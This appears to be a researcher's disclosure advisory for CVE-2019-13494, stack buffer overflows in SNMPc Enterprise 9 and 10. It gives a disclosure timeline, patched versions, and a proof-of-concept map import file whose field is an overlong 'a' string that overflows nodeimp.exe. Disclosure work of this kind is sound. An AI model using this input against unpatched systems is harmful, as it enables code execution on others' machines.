(CVE-2019-13494) SNMPc Enterprise Edition 9 & 10 Stack Based Buffer Overflow
Background:
On the 27th May 2019 I discovered a number of stack-based buffer overflows in Castle Rock Computing’s SNMPc Enterprise Edition 9 & 10. Exploitation of these vulnerabilities allows an attacker to execute arbitrary code on the targeted system/s.
Castle Rock Computing’s (CRC) SNMPc Enterprise 10 “is a secure distributed Network Management System which delivers proactive real-time monitoring for your entire network infrastructure. Advanced product features and legendary ease of use have led to over 120,000 network managers trusting SNMPc to monitor their mission critical networks”. Further information about the company and product can be found at the following URL: https://www.castlerock.com/products/snmpc/
Vulnerable versions of CRC’s SNMPc Enterprise 9 & 10 software contain a number of stack-based buffer overflow conditions, where an overly long input string overruns a fixed-size buffer allocated on the stack. An attacker may leverage these vulnerabilities to execute arbitrary code on the targeted system/s in the context of the user running the affected process.
Customers using CRC’s SNMPc Enterprise 9 or 10 software are strongly advised to address these vulnerabilities by upgrading to either SNMPc v10.0.9 or SNMPc v9.0.12.1, available from Castle Rock Computing’s website: https://www.castlerock.com/
Exploit difficulty:
An attacker must have low-privileged authenticated access to the local target system in order to exploit this vulnerability, or be able to social-engineer the user into accepting the malformed Map Objects text file.
An attacker who successfully exploits the stack-based buffer overflow vulnerabilities can execute arbitrary code on the target system with the same privilege rights and context of the user running the process.
Disclosure Timeline:
27 May 2019
– Stack-based buffer overflows discovered. Further testing commenced.
07 June 2019
– Emailed Castle Rock Computing (CRC) requesting an email address to disclose vulnerabilities.
– CRC created an incident number (CRC285149) and provided the requested details.
10 June 2019
– Vulnerability disclosed to CRC. 45-day disclosure time frame allocated (25 July 2019 public disclosure date).
– CRC acknowledged receipt of the disclosure email.
11 June 2019
– CRC engineers released a patch for the vulnerable binaries.
– Retested the patched binaries and confirmed with CRC that the stack-based buffer overflow vulnerabilities have been fixed.
12 June 2019
– CRC advised that software build 10.0.9 is scheduled for release around July 8th.
2 July 2019
– CRC advised that the patch date of July 8th is still planned.
– Mutual agreement that the CVE-ID will be requested by myself from Mitre once CRC confirms the date.
10 July 2019
– CRC advised that the patch is now available on their website.
– CVE-ID requested.
11 July 2019
– CVE-2019-13494 allocated by Mitre.
– Public disclosure of vulnerability.
Details:
Product: SNMPc Enterprise
Version: Latest version 9 & 10 and prior
Vendor: Castle Rock Computing
CVE-ID: CVE-2019-13494
CWE-ID: CWE-121 Stack-based Buffer Overflow
A number of program executables have been individually tested and can be successfully exploited when overwriting the buffer in the vulnerable version of CRC’s SNMPc Enterprise 10.
The nodeimp.exe executable is invoked when a user imports Map Objects from a text file within the SNMPc Management Console (File > Import > Map Objects From Text File). This executable is vulnerable to a stack-based buffer overflow when the imported map text file contains an overly long string in one of its fields.
Example map text file:
Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"Root Subnet","Subnet","","","","2","000=Unknown","","auto.ico","","2","Square","(NULL)","(0,0)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","0","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa